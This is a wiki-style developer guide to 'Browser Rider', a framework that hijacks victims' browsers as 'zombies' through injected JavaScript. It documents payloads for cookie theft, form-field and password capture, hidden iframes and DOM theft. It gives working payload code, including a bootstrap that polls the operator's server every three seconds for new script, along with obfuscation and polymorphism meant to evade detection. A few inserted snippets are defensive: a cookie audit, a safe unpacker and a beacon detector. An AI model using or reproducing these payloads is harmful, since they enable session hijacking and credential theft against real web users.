Browser Rider Payloads

From Engineering For Fun


Targeted payloads & autoload payloads

A payload can be delivered in two different ways.

  • The first is a targeted attack: in the administration panel you manually select the zombie you want to target and send it your code.
  • The second is an autoload attack: the payload is sent automatically to every zombie that visits an infected page.

Existing payloads

Each entry gives the payload name, its description and its author:

  • append_iframe: appends an iframe to the target's DOM (Benjilenoob)
  • auto_refresh: automatically reloads Browser Rider to check for updates (Benjilenoob)
  • box_alert: loads an alert box (Benjilenoob)
  • box_prompt: loads a prompt box to ask something and saves the answer (Benjilenoob)
  • cookie_stealing: automatically steals your zombies' cookies (Benjilenoob)
  • exec_javascript: executes some JavaScript code (Benjilenoob)
  • fieldlogger: steals data from forms (X-Tense)
  • get_DOM: downloads the victim page's DOM (Benjilenoob)
  • keep_alive: keeps targets in a frame (Benjilenoob)

Payload: append_iframe

append_iframe is a simple payload that adds an iframe to the zombie's infected page. It can be used to trigger a cross-site request forgery over GET or to push a file download to the zombie.

Payload: auto_refresh

auto_refresh is a very important payload: it is what allows Browser Rider to send JavaScript to the zombie on the fly. auto_refresh creates a script tag that links to Browser Rider; any JavaScript returned is executed, then auto_refresh removes the script tag, creates a new one, and so on.

Payload: box_prompt

box_prompt's purpose is to show the zombie a prompt() box carrying the message you have set. The zombie types an answer and confirms the box; you then retrieve the zombie's reply from the administration panel.

This payload can be used to ask for a password, for example.

Payload: cookie_stealing

cookie_stealing steals the zombie's cookie and saves it in Browser Rider; you can then retrieve it from the administration panel.

This is very useful if you want to hijack the zombie's session using its cookie.
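A payload such as cookie_stealing runs as page script, so it can only read the cookies that the browser exposes through document.cookie; a cookie carrying the HttpOnly attribute is never visible there, and Secure and SameSite limit where the cookie is sent at all. The following Node.js snippet is an added example (not part of Browser Rider or of this page) that audits Set-Cookie headers for exactly those attributes; the header values are constructed.

```javascript
// Added example (not part of Browser Rider or of this page): audit Set-Cookie
// headers for the attributes that keep a cookie out of document.cookie and off
// plaintext connections. The header values below are constructed.
const SAMPLE_SET_COOKIE = [
  "PHPSESSID=abc123; Path=/",
  "session=def456; Path=/; Secure; HttpOnly; SameSite=Lax",
  "prefs=dark; Path=/; Secure",
];

// Parse one Set-Cookie header value into its name and the security attributes we care about.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const cookie = {
    name: eq === -1 ? pair : pair.slice(0, eq),
    httpOnly: false,
    secure: false,
    sameSite: null,
  };
  for (const attr of attrs) {
    const [rawKey, rawValue] = attr.split("=");
    const key = rawKey.trim().toLowerCase();
    if (key === "httponly") cookie.httpOnly = true;
    else if (key === "secure") cookie.secure = true;
    else if (key === "samesite") cookie.sameSite = (rawValue || "").trim();
  }
  return cookie;
}

// One entry per header: the cookie name and the list of weaknesses found.
function auditCookies(headers) {
  return headers.map(parseSetCookie).map((c) => {
    const findings = [];
    if (!c.httpOnly) findings.push("readable by page script via document.cookie (no HttpOnly)");
    if (!c.secure) findings.push("sent over plaintext HTTP (no Secure)");
    if (!c.sameSite) findings.push("no SameSite attribute");
    return { name: c.name, findings };
  });
}

for (const { name, findings } of auditCookies(SAMPLE_SET_COOKIE)) {
  console.log(`${name}: ${findings.length ? findings.join("; ") : "ok"}`);
}
```

Run it against the Set-Cookie headers of a real response (for example copied from the browser's network panel) to see which session cookies a script running in the page could read.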

Payload: exec_javascript

Executes any JavaScript code you enter in a text box on a selected zombie.

Payload: fieldlogger

Steals the values a victim has entered in a form. This payload is very useful if you want to steal passwords or private information. Thanks to X-Tense for providing us with this payload.

Payload: get_DOM

Steals the HTML source of your targets' pages. You can then view it in the administration panel. With this payload you can see pages you don't necessarily have access to.

Payload: keep_alive

Puts your targets in an iframe so that even if they visit another page that is not infected by Browser Rider, we still keep contact with the zombie.

Writing a payload in Browser Rider

When you download Browser Rider, it ships with a list of public payloads ready to be fired at your zombies. However, you will probably want to write your own. There are a few things to understand in order to do so.

First of all, any payload you write must be placed in the /payloads folder located in the /lib/plouf/ directory of the project. Each payload should have at least one PHP file, which acts as the controller for the attack and manages the payload in the administration panel. In the same folder you will find two sub-folders, /payloads/javascript/ and /payloads/templates/: the first contains the JavaScript exploit and the second the template used to manage the payload in the administration panel.

As an example, let's take the box_prompt payload; it has three related files:

  • /payloads/box_prompt.php, the controller
  • /payloads/javascript/box_prompt.js, the actual JavaScript code (the exploit)
  • /payloads/templates/box_prompt.tpl, the template used to manage the payload in the administration panel

If you are familiar with PHP, I suggest you look directly at the existing payloads shipped with the tool. You should be able to pick up how it works from them.

Writing the Javascript exploit

Create a new .js file in the /payloads/javascript folder and start coding your exploit :)

As an example let's have a look at append_iframe.js

function {$FUNCTIONNAME}()
{ldelim}
    var b = document.getElementsByTagName("body")[0];

    var i = document.createElement("iframe");
    var as = document.createAttribute("src");
    as.nodeValue = "{$SRC}";
    i.setAttributeNode(as);
    var st = document.createAttribute("style");
    st.nodeValue = "width:1px;height:1px;";
    i.setAttributeNode(st);
    b.appendChild(i);
{rdelim};
window.onload = {$FUNCTIONNAME}();

In Browser Rider, the exploit is passed through Smarty before being sent to the zombie(s). Refer to the Smarty section if you don't know what it is.

In this simple exploit, which just appends a frame to the victim's page, we notice {$FUNCTIONNAME} and {$SRC}. Those variables are generated and set by the payload controller through Smarty. In our case {$FUNCTIONNAME} is a randomly generated string and {$SRC} is the URL the iframe points to:

$this->setRenderData('FUNCTIONNAME',strrand(3,5,S_LETTERS));
$this->setRenderData('SRC',htmlentities($result['src']));

Writing the controller

Inheritance and Interface

In order to run any payload in the framework, the payload needs to extend (inherit from) the PayloadModule class and implement the PayloadInterface interface.

Example:

class box_alert extends PayloadModule implements PayloadInterface

PayloadModule class

This class is located in /lib/plouf/PayloadModule.php. It is the superclass of all payload modules and itself extends the ControlModule class (more details about that one later).

This class provides the payload with the following methods:

public function setRenderData($name, $data)
    Assigns data to be rendered into the JavaScript.
    $this->setRenderData('ZOMBIE_IP', $this->http->getIPAddress());

public function getRenderData()
    Returns the data assigned to the JavaScript.
    $data = $this->getRenderData();

protected function attachZombieToPayload($payload_name, $zombie_ip)
    Sets a zombie to be attacked with a given payload.
    $this->attachZombieToPayload('box_prompt', '127.0.0.1');

public function useLibrary($library)
    Assigns a library for the payload to use.
    $this->useLibrary('AttackAPI');

PayloadInterface interface

This interface is located in /lib/plouf/PayloadModule.php. Payloads need to implement it so that they all follow a common template and the framework is able to run each of them. This means every payload you write must have the following methods:

  • public function install();
  • public function remove();
  • public function main();
  • public function run();

The install() function is called when the payload is installed. As an example, let's have a look at the box_alert payload:

/*
 * This function is defined in the interface, so we have to implement it in this class.
 * Its purpose is to install the payload: everything needed to install the payload
 * is done here.
 *
 * In our case, we are going to create two tables.
 */
public function install()
{
    // the first table holds the messages to be loaded individually to our zombies
    $SQLQuery = "CREATE TABLE IF NOT EXISTS pay_box_alert (
        id INTEGER NOT NULL AUTO_INCREMENT,
        ip VARCHAR(15) NOT NULL,
        msg TEXT NOT NULL,
        done INT(1) DEFAULT 0,
        PRIMARY KEY(id)
    )";
    $this->db->query($SQLQuery) or $this->db->dieError(__FILE__, __LINE__);
    // the second table is for the autoload module: a message stored here is
    // loaded to every zombie EACH time it visits an infected page.
    $SQLQuery = "CREATE TABLE IF NOT EXISTS pay_box_alert_autoload (
        message TEXT NOT NULL,
        date INT(10)
    )";
    $this->db->query($SQLQuery) or $this->db->dieError(__FILE__, __LINE__);
}

As you can see, we create the two tables required for the payload to work.

The remove() function is called by the framework when uninstalling a payload. Let's look at box_alert's code again:

/*
 * This function uninstalls the payload.
 * We remove the two tables we created previously in install().
 */
public function remove()
{
    $SQLQuery = "DROP TABLE IF EXISTS pay_box_alert, pay_box_alert_autoload";
    $this->db->query($SQLQuery) or die(mysql_errno());
}

Here we drop the two tables created during installation to remove the payload.

The main() method is the controller of the template. It manages everything like inserting new rows in the database. In the case of box_alert we gather the message the hacker (you) wants to send to the zombie and insert it into our database.

/*
 * This function is the controller of the template view
 * displayed in the administration panel.
 */
public function main()
{
    $ip = $this->http->getCleanString('ip'); // we retrieve the ip of the target to attack with the payload
    // IF there is an 'ip' we display the individual configuration
    if($ip != false)
    {
        $this->setRenderData('INDIVIDUAL', 1); // we assign the variable $INDIVIDUAL to Smarty
        $this->setRenderData('IP', $ip);       // we assign the variable $IP to Smarty

        // IF a new message has been sent we update the database
        $msg = $this->http->getCleanString('msg', 'POST');
        if($msg != false) // we check that the var 'msg' has been sent by POST
        {
            $this->setRenderData('UPDATED', 1);
            // we update our database
            $SQLQuery = "INSERT INTO pay_box_alert (ip, msg) VALUES ('$ip', '$msg')";
            $this->db->query($SQLQuery) or $this->db->dieError(__FILE__, __LINE__);
            // we link our target to our payload
            $this->attachZombieToPayload('box_alert', $ip);
        }
    }
    // IF NOT we display the form to set the message to autoload
    else
    {
        // we check if a message to set has been sent
        if(($msg = $this->http->getCleanString('msg', 'POST')) != false)
        {
            $date = date('Ymdis');
            $SQLQuery = "INSERT INTO pay_box_alert_autoload (message, date) VALUES ('$msg', '$date')";
            $this->db->query($SQLQuery) or $this->db->dieError(__FILE__, __LINE__);
            $this->setRenderData('AUTOLOAD', 1);
        }
    }
}

The run() function is used by the tool when the payload is loaded onto the zombie. In the case of box_alert, we check whether there are any messages to send to the zombie and, if so, send it a JavaScript alert() box.

/*
 * This function runs the payload. You can see it as the payload's
 * controller on the zombie side.
 */
public function run()
{
    $ip = addslashes($_SERVER['REMOTE_ADDR']); // we retrieve our target's ip address
    /** first we check for individual messages to send **/
    $SQLQuery = "SELECT id, msg FROM pay_box_alert WHERE ip='$ip' AND done=0";
    $Query = $this->db->query($SQLQuery) or $this->db->dieError(__FILE__, __LINE__);
    if($this->db->numRows($Query) != 0)
    {
        // we retrieve all the messages to load to the target
        while($message = $this->db->fetchAssoc($Query))
        {
            // we update the table to mark the message as sent: once loaded,
            // messages are flagged so the same message is never sent twice
            $id = addslashes($message['id']);
            $SQLQuery = "UPDATE pay_box_alert SET done='1' WHERE id='$id'";
            $this->db->query($SQLQuery) or $this->db->dieError(__FILE__, __LINE__);
            // we display the message box
            $msg = addslashes($message['msg']);
            // THE ATTACK :p
            echo "alert(\"$msg\");";
        }
    }

    /** then we check if the module is in autoload mode **/
    $SQLQuery = "SELECT is_automatic FROM payload WHERE name='box_alert' AND is_automatic='1'";
    $Query = $this->db->query($SQLQuery) or $this->db->dieError(__FILE__, __LINE__);
    if($this->db->numRows($Query) != 0)
    {
        // if the payload is in automatic mode we load it!
        $SQLQuery = 'SELECT message FROM pay_box_alert_autoload ORDER BY date DESC';
        $Query = $this->db->query($SQLQuery) or $this->db->dieError(__FILE__, __LINE__);
        $message = $this->db->fetchAssoc($Query);
        if(!empty($message)) {
            $message = addslashes($message['message']);
            // THE ATTACK :p
            echo "alert(\"$message\");";
        }
    }
}

The payload's attributes

public $smarty=false;              // the payload requires Smarty
public $description;               // the payload description
public $obfuscator=null;           // the name of the obfuscator to use
public $obfuscator_options=null;   // the options of the obfuscator to use
public $individual=false;          // the payload can be loaded individually (targeted)
public $proc_name;                 // the process name
public $auto_load=false;           // the payload can be autoloaded
public $libraries=array();         // libraries to load for the payload to work
public $minify=true;               // if the payload is not obfuscated, we compress/minify it with JSMin

Using existing JavaScript libraries

All libraries must be placed in /payloads/libraries; you can then load them with the useLibrary() function of PayloadModule:

$this->useLibrary('AttackAPI-standalone');

Available libraries (name, description, author):

  • AttackAPI-standalone: AttackAPI provides a simple and intuitive programmable interface for composing attack vectors with JavaScript and other client- and server-related technologies. (Petko Petkov)
  • jquery-1.2.6.min: jQuery is a fast and concise JavaScript library that simplifies HTML document traversing, event handling, animating, and Ajax interactions for rapid web development. (jquery.com)
  • mootools-1.2-core: a super lightweight web 2.0 JavaScript framework. (mootools.net)
  • jquery.timers: jQuery Timers is a high-level abstraction of setTimeout and setInterval. (unknown)

Some examples

cookie_stealing

public function __construct()
{
    parent::__construct();                     // we construct the parent class
    $this->description='Steal targets\' cookie'; // the description of the payload
    $this->smarty=true;                        // the payload uses the Smarty template
    $this->obfuscator='DeanEdwards';           // name of the obfuscator to use
    $this->auto_load=true;                     // the payload can be loaded automatically
    $this->db=Database::getInstance();         // we retrieve the database instance
}

exec_javascript

public function __construct()
{
    parent::__construct();
    $this->db = Database::getInstance();       // we get the database instance
    $this->individual=true;                    // the payload can be loaded individually
    $this->description='Executes javascript';
    $this->smarty=false;                       // the payload does not use Smarty
    $this->auto_load=true;                     // the payload can be loaded automatically
}

auto_refresh

public function __construct()
{
    parent::__construct();                     // we construct the parent class
    $this->description='Automatically reload BrowserRider to check for updates (important)'; // the description of the payload
    $this->smarty=true;                        // the payload uses the Smarty template
    $this->obfuscator='DeanEdwards';           // name of the obfuscator to use
    $this->auto_load=true;                     // the payload can be loaded automatically
}

Writing the Administration Template

Just like the JavaScript exploit, create a .tpl file in the /payloads/templates/ folder. This template also uses Smarty (refer to the Smarty section if you don't know what it is).

Let's have a quick look at append_iframe.tpl

<h2>Append an Iframe to the DOM</h2>

<p>
    This payload appends an iframe to the DOM. It can be useful if you want to make your target
    download something :)
</p>

{if $IP!=''}
    <form action="append_iframe?ip={$IP}" method="POST">
        <input type="text" name="src" />
        <input type="submit" value="append" />
    </form>
    <br />
    {if $SENT!=''}Payload sent{/if}
{else}
    <p>
        <b>This payload only works with targeted zombies; you can't configure it to be automatically loaded.</b>
    </p>
{/if}

It's pretty simple: if $IP has been set by the controller we display the form; otherwise we show a message saying that the payload can only be used against selected zombies and cannot be autoloaded.

Obfuscation

In Browser Rider you can use existing packers or develop your own. Using an obfuscator with a payload is easy: just set the payload's $this->obfuscator attribute to whichever obfuscator you want.

For example, to use DeanEdwards:

$this->obfuscator='DeanEdwards';

Any obfuscator must be placed in the folder /lib/plouf/obfuscators/

To give you an idea of what an automatically obfuscated payload looks like:

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0 6="4://3/2/5/9.7?a=1";0 8="b";',12,12,'var||projects|localhost|http|BrowserRider|framework|js|nodename|RqAarSj|ar|xCU'.split('|'),0,{})) 
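The blob above is the output of Dean Edwards' packer (the DeanEdwards obfuscator named earlier on this page). An analyst who finds such a blob in a captured page or proxy log wants to know what it does and where it points without running it through eval(). The following Node.js snippet is an added example (not part of Browser Rider or of this page): it recognises the packer prologue and replays the decoder's token substitution on the packed sample quoted above, recovering the plain source and the framework URL the bootstrap will call.

```javascript
// Added example (not part of Browser Rider or of this page): detect Dean Edwards
// p,a,c,k,e,d output and recover the source without eval(). The sample is the
// packed auto_refresh bootstrap quoted on the page.
const PACKED_SAMPLE = String.raw`eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0 6="4://3/2/5/9.7?a=1";0 8="b";',12,12,'var||projects|localhost|http|BrowserRider|framework|js|nodename|RqAarSj|ar|xCU'.split('|'),0,{}))`;

// Signature of the packer's decoder prologue (older output names the last parameter d, newer r).
const PACKER_PROLOGUE = /eval\(function\(p,a,c,k,e,[dr]\)/;

function isPacked(source) {
  return PACKER_PROLOGUE.test(source);
}

// Encode an index the way the packer names its tokens: base-`radix`, with
// digits above 35 mapped to upper-case letters via String.fromCharCode(digit + 29).
function tokenFor(index, radix) {
  const digit = index % radix;
  const head = index < radix ? "" : tokenFor(Math.floor(index / radix), radix);
  return head + (digit > 35 ? String.fromCharCode(digit + 29) : digit.toString(36));
}

// Pull the packer's arguments (payload, radix, count, word list) out of the
// blob and replay the decoder loop: every token is replaced by its word,
// highest index first, exactly as the eval'd function would do.
function unpack(source) {
  const m = source.match(/\}\('([\s\S]*)',\s*(\d+),\s*(\d+),\s*'([\s\S]*)'\.split\('\|'\)/);
  if (!m) throw new Error("not p,a,c,k,e,d output");
  let payload = m[1].replace(/\\'/g, "'").replace(/\\\\/g, "\\");
  const radix = Number(m[2]);
  let count = Number(m[3]);
  const words = m[4].split("|");
  while (count--) {
    const word = words[count];
    if (word) {
      const token = new RegExp("\\b" + tokenFor(count, radix) + "\\b", "g");
      payload = payload.replace(token, () => word); // function form: no $-pattern expansion
    }
  }
  return payload;
}

// First absolute http(s) URL in the recovered source: the beacon endpoint.
function beaconUrl(unpacked) {
  const m = unpacked.match(/https?:\/\/[^"'\s]+/);
  return m ? m[0] : null;
}

if (isPacked(PACKED_SAMPLE)) {
  const plain = unpack(PACKED_SAMPLE);
  console.log(plain);
  console.log("beacon:", beaconUrl(plain));
}
```

Unpacking this way is safe to run on untrusted input because the packed payload is only ever treated as a string; the packer's own decoder, by contrast, hands the result to eval(). Note that the obfuscator changes only the appearance of the bootstrap, not its behaviour, so the recovered URL is what the zombie will poll.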

Polymorphism

Definition: the occurrence of many forms of the same species.

Because we generate the JavaScript code with PHP (in most cases through Smarty), we can change the way a payload runs, and how it looks, each time it is served.

Let's take a very simple example: the JavaScript code of the auto_refresh payload.

var framework = "{$BROWSERRIDER_URL}";
var nodename = "{$NODENAME}";
{if $ISRUNNING!=1}
var {$INCREMENTOR} = 0;
var {$OLDNODENAME};

function {$FUNCTION_NAME}()
{ldelim}
    var b = document.getElementsByTagName("body")[0];

    if({$INCREMENTOR} != 0)
    {ldelim}
        var s = document.getElementsByName({$OLDNODENAME})[0];
        b.removeChild(s);
    {rdelim}

    var s = document.createElement("script");
    var as = document.createAttribute("src");
    as.nodeValue = framework;
    s.setAttributeNode(as);
    var an = document.createAttribute("name");
    an.nodeValue = nodename;
    s.setAttributeNode(an);
    b.appendChild(s);

    {$INCREMENTOR}++;
    {$OLDNODENAME} = nodename;
{rdelim};

window.setInterval("{$FUNCTION_NAME}()", 3000);
{/if}

We can see variables like {$OLDNODENAME} or {$FUNCTION_NAME}, which are randomly generated by the payload controller (the run() function), so each time our payload runs it looks a bit different.
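Whatever the random names look like, the auto_refresh bootstrap above still calls window.setInterval with a fixed 3000 ms period, so every zombie re-fetches the framework script on a steady cadence. That cadence is the part polymorphism and obfuscation do not hide, and it shows up in web-proxy or server access logs. The following Node.js snippet is an added example (not part of Browser Rider or of this page) that groups requests by client and path and flags fixed-interval polling; the log format and all lines are constructed.

```javascript
// Added example (not part of Browser Rider or of this page): flag clients that
// re-fetch the same resource on a fixed cadence, the footprint of the
// auto_refresh setInterval loop. Log format and all lines below are constructed.
const SAMPLE_LOG = [
  "10.0.0.5 2024-05-01T10:00:00Z GET /projects/BrowserRider/RqAarSj.js?ar=1",
  "10.0.0.5 2024-05-01T10:00:03Z GET /projects/BrowserRider/RqAarSj.js?ar=1",
  "10.0.0.5 2024-05-01T10:00:06Z GET /projects/BrowserRider/RqAarSj.js?ar=1",
  "10.0.0.5 2024-05-01T10:00:09Z GET /projects/BrowserRider/RqAarSj.js?ar=1",
  "10.0.0.5 2024-05-01T10:00:12Z GET /projects/BrowserRider/RqAarSj.js?ar=1",
  "10.0.0.7 2024-05-01T10:00:01Z GET /index.html",
  "10.0.0.7 2024-05-01T10:00:45Z GET /app.js",
  "10.0.0.7 2024-05-01T10:02:10Z GET /app.js",
  "10.0.0.9 2024-05-01T10:01:00Z GET /app.js",   // four hits but irregular gaps:
  "10.0.0.9 2024-05-01T10:01:02Z GET /app.js",   // ordinary browsing, not a beacon
  "10.0.0.9 2024-05-01T10:01:30Z GET /app.js",
  "10.0.0.9 2024-05-01T10:01:31Z GET /app.js",
];

// "client timestamp method path" -> record, or null for lines that do not parse.
function parseLine(line) {
  const m = line.match(/^(\S+) (\S+) (\S+) (\S+)$/);
  if (!m) return null;
  const ts = Date.parse(m[2]);
  return Number.isNaN(ts) ? null : { client: m[1], ts, method: m[3], path: m[4] };
}

function median(values) {
  const s = [...values].sort((a, b) => a - b);
  return s[Math.floor(s.length / 2)];
}

// One finding per (client, path) pair requested at least minHits times with
// every inter-request gap within maxJitterMs of the median gap.
function findBeacons(lines, { minHits = 4, maxJitterMs = 500 } = {}) {
  const groups = new Map();
  for (const line of lines) {
    const r = parseLine(line);
    if (!r) continue;
    const key = `${r.client}\t${r.path}`;
    if (!groups.has(key)) groups.set(key, { client: r.client, path: r.path, stamps: [] });
    groups.get(key).stamps.push(r.ts);
  }
  const findings = [];
  for (const g of groups.values()) {
    if (g.stamps.length < minHits) continue;
    g.stamps.sort((a, b) => a - b);
    const gaps = g.stamps.slice(1).map((t, i) => t - g.stamps[i]);
    const periodMs = median(gaps);
    const jitterMs = Math.max(...gaps.map((gap) => Math.abs(gap - periodMs)));
    if (periodMs > 0 && jitterMs <= maxJitterMs) {
      findings.push({ client: g.client, path: g.path, hits: g.stamps.length, periodMs, jitterMs });
    }
  }
  return findings;
}

for (const f of findBeacons(SAMPLE_LOG)) {
  console.log(`${f.client} polls ${f.path} every ${f.periodMs} ms (${f.hits} hits, jitter ${f.jitterMs} ms)`);
}
```

Grouping on the exact path works because the randomised script name is fixed for the lifetime of one bootstrap; if you expect the name to change between fetches, group on client and host (or path prefix) instead and keep the cadence test as the decisive signal. Raise maxJitterMs when the logs come from a proxy that buffers requests.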
